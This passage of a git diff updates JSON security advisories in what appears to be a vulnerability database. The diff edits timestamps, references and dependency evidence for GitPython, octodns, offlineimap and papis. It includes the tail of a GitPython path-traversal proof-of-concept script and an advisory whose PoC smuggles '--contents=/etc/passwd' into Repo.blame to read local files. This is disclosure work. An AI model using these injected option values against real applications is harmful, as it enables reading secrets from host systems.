\"OUTSIDE_SENTINEL\")\n target_gitdir = os.path.join(sentinel_dir, \"redirected.git\")\n\n for p in (src, dest, sentinel_dir):\n os.makedirs(p, exist_ok=True)\n\n # Minimal benign source repo to clone from.\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", src], check=True)\n subprocess.run([\"git\", \"-C\", src, \"config\", \"user.email\", \"test@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", src, \"config\", \"user.name\", \"Test\"], check=True)\n with open(os.path.join(src, \"file.txt\"), \"w\") as f:\n f.write(\"hello\\n\")\n subprocess.run([\"git\", \"-C\", src, \"add\", \"file.txt\"], check=True)\n subprocess.run([\"git\", \"-C\", src, \"commit\", \"-q\", \"-m\", \"init\"], check=True)\n\n import git # gitpython under test\n\n print(\"unsafe_git_clone_options =\", git.Repo.unsafe_git_clone_options)\n assert \"--separate-git-dir\" not in git.Repo.unsafe_git_clone_options, (\n \"guard now includes --separate-git-dir; PoC no longer applicable, target patched\"\n )\n\n try:\n repo = git.Repo.clone_from(src, dest, separate_git_dir=target_gitdir)\n except git.exc.UnsafeOptionError as e:\n print(\"NOT VULNERABLE: blocked by UnsafeOptionError:\", e)\n sys.exit(1)\n\n wrote_outside = os.path.isdir(os.path.join(target_gitdir, \"hooks\")) and os.path.isfile(\n os.path.join(target_gitdir, \"config\")\n )\n gitlink_points_outside = False\n with open(os.path.join(dest, \".git\")) as f:\n gitlink = f.read().strip()\n gitlink_points_outside = target_gitdir in gitlink\n\n print(\"repo.git_dir =\", repo.git_dir)\n print(\"wrote git directory outside dest (sentinel) =\", wrote_outside)\n print(\"dest/.git gitlink points outside dest =\", gitlink_points_outside)\n\n if wrote_outside and gitlink_points_outside:\n print(\"VULNERABLE: git directory created at attacker-controlled path \"\n f\"outside the clone destination: {target_gitdir}\")\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: sentinel not observed\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-8mcc-hrx5-hvxc" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-separate-git-dir" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78677" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-8mcc-hrx5-hvxc" + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2210" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/b68afff45af0f49e79a3e2d2162018986b37ad5d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3787.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-separate-git-dir" } ] } diff --git a/advisories/BREW-legit-CVE-2026-78678.json b/advisories/BREW-legit-CVE-2026-78678.json index dbf70d7a97..9a7515e321 100644 --- a/advisories/BREW-legit-CVE-2026-78678.json +++ b/advisories/BREW-legit-CVE-2026-78678.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-78678", "published": "2026-09-04T09:19:02Z", - "modified": "2026-09-05T09:12:41Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "PYSEC-2026-3788", "CVE-2026-78678", @@ -52,21 +52,34 @@ } ] }, - "details": "GitPython versions before 3.1.59 contain an incomplete denylist in the unsafe_git_revision_options guard that omits --contents and -S options, allowing attackers to read arbitrary files by passing these options to Repo.blame(). Attackers can supply revision values like --contents=/etc/passwd to leak file contents through the blame result returned to the caller.", + "summary": "GitPython: Incomplete unsafe_git_revision_options denylist omits --contents/-S, enabling arbitrary file read via Repo.blame()", + "details": "## Summary\n`Repo.blame()` / `Repo.blame_incremental()` guard forwarded revision options against `unsafe_git_revision_options`, but that denylist only contains the file-WRITE options `--output`/`-o`. `git blame` also honors `--contents ` and `-S `, which cause the file's lines to be echoed into the blame result — an arbitrary file READ. Neither option is in the denylist, so a caller-influenced revision value of `--contents=` passes the guard and leaks file contents. This is a distinct sink-option and impact class (READ) from GHSA-956x-8gvw-wg5v (which addressed the blame `--output` WRITE), directly analogous to GHSA-539m-9xh6-q6rr (archive READ gap accepted separately from the archive write/exec advisory).\n\n## Root Cause\n`unsafe_git_revision_options = [\"--output\",\"-o\"]` (`git/repo/base.py:188`). The `rev` string is passed to `_option_candidates([rev], kwargs)` and placed BEFORE the `--` separator (base.py:841). The canonical name of `--contents=...` is `contents`, which is not on the denylist, so no `UnsafeOptionError` is raised. The trailing `--` protects only the pathspec, not the option before the revision.\n\n## Impact\nArbitrary local file read at the privileges of the host process; the file's line contents appear in the blame result returned to the caller. Pure VALUE control (the caller forwards a user-influenced revision string). Default `allow_unsafe_options=False`.\n\n## Proof of Concept\n```python\nresult = repo.blame(\"--contents=/etc/passwd\", \"a.txt\")\n# result rows carry the victim file's line text\n```\n\n## Attack Chain\n1. Entry: app calls `repo.blame(rev, file)` with attacker `rev=\"--contents=/etc/passwd\"` (or kwarg `contents=\"/etc/passwd\"`, or `-S`).\n2. Check: `Git.check_unsafe_options(_option_candidates([rev,...], kwargs), unsafe_git_revision_options)` @ base.py:841. Guard: denylist = `[\"--output\",\"-o\"]` only. Bypass proof: canonical name `contents` ∉ denylist → no error.\n3. Sink: `self.git.blame(rev, \"--\", file, p=True, ...)`. argv (observed): `['git','blame','-p','--contents=','HEAD','--','a.txt']`.\n4. Impact: blame result rows carry the victim file's line text.\n\n## Bypass Evidence\nIndependently reproduced (independent test harness, default `allow_unsafe_options=False`): `blame('--contents=','a.txt')` → guard PASSED; result rows = `['GATE_SECRET_LINE_A','GATE_SECRET_LINE_B']`. Control: `blame('--output=…')` still BLOCKED (guard active on this path). `-S` kwarg argv also reaches git unguarded.\n\n## Affected Versions\n`GitPython <= 3.1.58` (denylist present verbatim on the latest release tag).\n\n## Suggested Fix\nPrefer an allowlist of blame options; at minimum add `--contents`/`-S` (and any other path-taking blame options) to `unsafe_git_revision_options`, and make the membership rule \"the option takes a filesystem path\" rather than \"the option writes output\".\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", "severity": [ { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-5xxx-qhh7-9287" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-repo-blame" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78678" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-5xxx-qhh7-9287" + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3788.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-repo-blame" } ] } diff --git a/advisories/BREW-octodns-CVE-2017-18342.json b/advisories/BREW-octodns-CVE-2017-18342.json index 48c38895b5..011efb5115 100644 --- a/advisories/BREW-octodns-CVE-2017-18342.json +++ b/advisories/BREW-octodns-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-octodns-CVE-2017-18342", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-octodns-CVE-2019-20477.json b/advisories/BREW-octodns-CVE-2019-20477.json index 92df278b6b..16c4824f1e 100644 --- a/advisories/BREW-octodns-CVE-2019-20477.json +++ b/advisories/BREW-octodns-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-octodns-CVE-2019-20477", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-octodns-CVE-2020-14343.json b/advisories/BREW-octodns-CVE-2020-14343.json index b7ef5cf5c7..eb83f321fd 100644 --- a/advisories/BREW-octodns-CVE-2020-14343.json +++ b/advisories/BREW-octodns-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-octodns-CVE-2020-14343", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-octodns-CVE-2020-1747.json b/advisories/BREW-octodns-CVE-2020-1747.json index a217672643..1912b88d83 100644 --- a/advisories/BREW-octodns-CVE-2020-1747.json +++ b/advisories/BREW-octodns-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-octodns-CVE-2020-1747", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-octodns-CVE-2023-29483.json b/advisories/BREW-octodns-CVE-2023-29483.json index d89d0c6594..7dc0647ff8 100644 --- a/advisories/BREW-octodns-CVE-2023-29483.json +++ b/advisories/BREW-octodns-CVE-2023-29483.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-octodns-CVE-2023-29483", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-3rq5-2g8h-59hc", "CVE-2023-29483", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "dnspython", - "subject_version": "2.8.0", - "key": "pkg:pypi/dnspython@2.8.0", - "resource": "dnspython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-octodns-CVE-2024-3651.json b/advisories/BREW-octodns-CVE-2024-3651.json index e6b17bc45a..ad706d4f41 100644 --- a/advisories/BREW-octodns-CVE-2024-3651.json +++ b/advisories/BREW-octodns-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-octodns-CVE-2024-3651", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-octodns-CVE-2026-45409.json b/advisories/BREW-octodns-CVE-2026-45409.json index 9edd1e4068..690783dc1d 100644 --- a/advisories/BREW-octodns-CVE-2026-45409.json +++ b/advisories/BREW-octodns-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-octodns-CVE-2026-45409", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-offlineimap-CVE-2012-4571.json b/advisories/BREW-offlineimap-CVE-2012-4571.json index 7cc8772a08..e1c68d56cc 100644 --- a/advisories/BREW-offlineimap-CVE-2012-4571.json +++ b/advisories/BREW-offlineimap-CVE-2012-4571.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-offlineimap-CVE-2012-4571", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-p3h7-3c45-qj4v", "CVE-2012-4571", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-offlineimap-CVE-2012-5577.json b/advisories/BREW-offlineimap-CVE-2012-5577.json index 6dceed98af..94c13bde74 100644 --- a/advisories/BREW-offlineimap-CVE-2012-5577.json +++ b/advisories/BREW-offlineimap-CVE-2012-5577.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-offlineimap-CVE-2012-5577", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-p86x-652p-6385", "CVE-2012-5577", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-offlineimap-CVE-2012-5578.json b/advisories/BREW-offlineimap-CVE-2012-5578.json index 22c541b0da..65074dc27f 100644 --- a/advisories/BREW-offlineimap-CVE-2012-5578.json +++ b/advisories/BREW-offlineimap-CVE-2012-5578.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-offlineimap-CVE-2012-5578", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-8867-vpm3-g98g", "CVE-2012-5578", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-offlineimap-CVE-2026-23949.json b/advisories/BREW-offlineimap-CVE-2026-23949.json index 2a96f0f4ea..79bf1d2a6e 100644 --- a/advisories/BREW-offlineimap-CVE-2026-23949.json +++ b/advisories/BREW-offlineimap-CVE-2026-23949.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-offlineimap-CVE-2026-23949", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-58pv-8j8x-9vj2", "CVE-2026-23949", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jaraco-context", - "subject_version": "6.1.2", - "key": "pkg:pypi/jaraco-context@6.1.2", - "resource": "jaraco-context" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2014-1829.json b/advisories/BREW-papis-CVE-2014-1829.json index ee83ed82f4..51fa3f4871 100644 --- a/advisories/BREW-papis-CVE-2014-1829.json +++ b/advisories/BREW-papis-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2014-1829", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2014-1830.json b/advisories/BREW-papis-CVE-2014-1830.json index 0a977a74a7..832f70dabd 100644 --- a/advisories/BREW-papis-CVE-2014-1830.json +++ b/advisories/BREW-papis-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2014-1830", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2014-3146.json b/advisories/BREW-papis-CVE-2014-3146.json index e353bd07f6..73d62f3ad5 100644 --- a/advisories/BREW-papis-CVE-2014-3146.json +++ b/advisories/BREW-papis-CVE-2014-3146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2014-3146", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-57qw-cc2g-pv5p", "CVE-2014-3146", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.3.5", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.3", + "key": "pkg:pypi/lxml@6.1.3", "resource": "lxml" } ] diff --git a/advisories/BREW-papis-CVE-2015-2296.json b/advisories/BREW-papis-CVE-2015-2296.json index f6bf08055f..8dadfeb942 100644 --- a/advisories/BREW-papis-CVE-2015-2296.json +++ b/advisories/BREW-papis-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2015-2296", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2015-8557.json b/advisories/BREW-papis-CVE-2015-8557.json index 1c152abc8b..71bfe4fc98 100644 --- a/advisories/BREW-papis-CVE-2015-8557.json +++ b/advisories/BREW-papis-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2015-8557", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2016-10075.json b/advisories/BREW-papis-CVE-2016-10075.json index e0c1a2bfd7..746cb082f5 100644 --- a/advisories/BREW-papis-CVE-2016-10075.json +++ b/advisories/BREW-papis-CVE-2016-10075.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2016-10075", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-r7q7-xcjw-qx8q", "CVE-2016-10075", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tqdm", - "subject_version": "4.70.0", - "key": "pkg:pypi/tqdm@4.70.0", - "resource": "tqdm" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2016-9015.json b/advisories/BREW-papis-CVE-2016-9015.json index 25ad23885f..c8dbfe9eaa 100644 --- a/advisories/BREW-papis-CVE-2016-9015.json +++ b/advisories/BREW-papis-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2016-9015", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2017-18342.json b/advisories/BREW-papis-CVE-2017-18342.json index 5b54fc25d6..9424a8ceec 100644 --- a/advisories/BREW-papis-CVE-2017-18342.json +++ b/advisories/BREW-papis-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2017-18342", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2018-18074.json b/advisories/BREW-papis-CVE-2018-18074.json index 2bd14c5655..298a3fbbd9 100644 --- a/advisories/BREW-papis-CVE-2018-18074.json +++ b/advisories/BREW-papis-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2018-18074", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2018-19787.json b/advisories/BREW-papis-CVE-2018-19787.json index 95fd9223d6..0f298c11b4 100644 --- a/advisories/BREW-papis-CVE-2018-19787.json +++ b/advisories/BREW-papis-CVE-2018-19787.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2018-19787", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-xp26-p53h-6h2p", "CVE-2018-19787", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.2.5", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.3", + "key": "pkg:pypi/lxml@6.1.3", "resource": "lxml" } ] diff --git a/advisories/BREW-papis-CVE-2018-20060.json b/advisories/BREW-papis-CVE-2018-20060.json index 30e7f47b2a..f51b1538db 100644 --- a/advisories/BREW-papis-CVE-2018-20060.json +++ b/advisories/BREW-papis-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2018-20060", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2018-25091.json b/advisories/BREW-papis-CVE-2018-25091.json index 8d916d215a..1ca5891f63 100644 --- a/advisories/BREW-papis-CVE-2018-25091.json +++ b/advisories/BREW-papis-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2018-25091", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2019-11236.json b/advisories/BREW-papis-CVE-2019-11236.json index 194c6498fc..6e5981f6b7 100644 --- a/advisories/BREW-papis-CVE-2019-11236.json +++ b/advisories/BREW-papis-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2019-11236", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2019-11324.json 